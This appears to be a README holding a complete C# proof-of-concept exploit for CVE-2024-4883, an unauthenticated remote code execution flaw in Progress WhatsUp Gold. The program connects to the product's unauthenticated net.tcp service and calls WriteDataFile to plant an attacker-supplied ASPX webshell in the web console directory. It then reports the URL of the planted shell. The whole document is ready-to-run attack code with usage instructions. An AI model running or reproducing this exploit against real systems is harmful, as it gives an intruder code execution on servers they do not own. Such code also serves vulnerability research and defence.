README.md
Rendering markdown...
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using NmAPI;
using System.ServiceModel;
using WUGDataAccess.Core.DataContracts;
using System.Reflection;
namespace WhatsUpWriteDataFileExploit
{
internal class Program
{
static void Main(string[] args)
{
string banner = @"
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress WhatsUp Gold WriteDataFile Unauthenticated Remote Code Execution (CVE-2024-4883)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE
";
Console.WriteLine(banner);
Console.WriteLine("(^_^) Prepare for the Pwnage (^_^)\r\n");
string host = "127.0.0.1";
int port = 9643;
string webshell = null;
for (int i = 0; i < args.Length; i++)
{
if (args[i] == "--target" && i + 1 < args.Length)
host = args[i + 1];
else if (args[i] == "--port" && i + 1 < args.Length)
port = Int32.Parse(args[i + 1]);
else if (args[i] == "--webshell" && i + 1 < args.Length)
webshell = args[i + 1];
else if (args[i] == "--help" || args[i] == "-h" || args[i] == "/?")
{
Console.WriteLine("Usage: WhatsUpWriteDataFileExploit.exe --target 192.168.0.1 --port 9643 --webshell hax.aspx");
return;
}
}
string endpoint_address = string.Format(String.Format("net.tcp://{0}:{1}/", host, port));
ICoreServices core_client;
ChannelFactory<ICoreServices> core_channelFactory = new ChannelFactory<NmAPI.ICoreServices>(
new NetTcpBinding(SecurityMode.None),
endpoint_address
);
Console.WriteLine("(*) Connecting to ICoreServices " + endpoint_address);
core_client = core_channelFactory.CreateChannel();
Console.WriteLine("(*) Connection is ready");
string webshell_name = Guid.NewGuid().ToString() + ".aspx";
string webshell_path = @"C:\Program Files (x86)\Ipswitch\WhatsUp\html\NmConsole\" + webshell_name;
EntityDataFileTransfer dataFile = new EntityDataFileTransfer
{
FileInfo = new EntityFileInfo
{
DirectoryName = "test",
Name = webshell_path,
LastWriteTime = DateTime.Now
},
FileContents = System.IO.File.ReadAllBytes(webshell)
};
Console.WriteLine("(*) Using write what where primitive, to plant " + webshell_path);
core_client.WriteDataFile(dataFile);
Console.WriteLine($"(+) Webshell has been planted at https://{host}/NmConsole/"+ webshell_name);
}
}
}